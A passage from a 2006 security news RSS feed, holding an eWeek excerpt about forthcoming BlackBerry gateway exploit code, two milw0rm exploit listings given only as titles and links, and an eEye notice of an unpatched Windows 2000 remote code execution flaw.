By  Matt Hines<br>
August 8, 2006 	<br>
<br>
 Be the first to comment on this article<br>
<br>
<br>
Businesses that use gateway security appliances to protect Research In Motion's BlackBerry communications servers could be subject to attacks based on the planned release of exploit code by a high-profile malware researcher.<br>
ADVERTISEMENT<br>
<br>
According to a warning released by network security applications and device provider Secure Computing, organizations with their BlackBerry servers installed behind their gateway intrusion detection boxes could be compromised when researcher Jesse D'Aguanno, a consultant with risk management experts Praetorian Global, of Placerville, Calif., releases his code the week of Aug. 14. D'Aguanno first revealed his vulnerability exploit on Aug. 5 at the Defcon hacker convention in Las Vegas. ]]></description>
            <link>http://www.eweek.com/article2/0,1759,2000621,00.asp?kc=EWRSS03129TX1K0000614</link>
            <category>News</category>
            <pubDate>Tue, 08 Aug 2006 11:42:56 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: XChat -= 2.6.7 (win version) Remote Denial of Service Exploit (perl)</title>
            <description># rewritten because perl is more elegant than php&lt;br&gt;
# payload taken from original that ratboy submitted</description>
            <link>http://www.milw0rm.com/exploits/2147</link>
            <category>Exploits</category>
            <pubDate>Tue, 08 Aug 2006 10:15:32 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: docpile:we -= 0.2.2 (INIT_PATH) Remote File Inclusion Vulnerabilities</title>
            <description>***********************************&lt;br&gt;
TiTLE: docpile:we  v0.2.2 (INIT_PATH) Remote File Inclusion Vulnerability&lt;br&gt;
-&lt;br&gt;
Author: xoron&lt;br&gt;
-&lt;br&gt;
Class : Remote&lt;br&gt;
-&lt;br&gt;
cont@ct: x0r0n[at]hotmail[dot]com&lt;br&gt;
-&lt;br&gt;
URL: http://docpile-we.berlios.de</description>
            <link>http://www.milw0rm.com/exploits/2146</link>
            <category>Exploits</category>
            <pubDate>Tue, 08 Aug 2006 10:14:57 -0400</pubDate>
        </item>

        <item>
            <title>eEye Upcoming Advisories (Microsoft)</title>
            <description><![CDATA[<br>
Date Reported:<br>
July 25, 2006<br>
<br>
Vendor:<br>
Microsoft<br>
<br>
Description:<br>
A flaw exists in a default Windows component that when exploited allows for remote code execution in SYSTEM context allowing an attacker to take complete control of affected systems.<br>
<br>
Severity:<br>
High (Remote Code Execution)<br>
<br>
Remote Code Execution:<br>
Yes<br>
<br>
Operating Systems Affected:<br>
Windows 2000<br>
[Other operating systems are being researched]<br>
<br>
Status:<br>
Initial reporting stage<br>
]]></description>
            <link>http://www.eeye.com/html/research/upcoming/20060725.html</link>
            <category>Misc</category>
            <pubDate>Tue, 08 Aug 2006 10:13:23 -0400</pubDate>
        </item>

    </channel>
</rss>
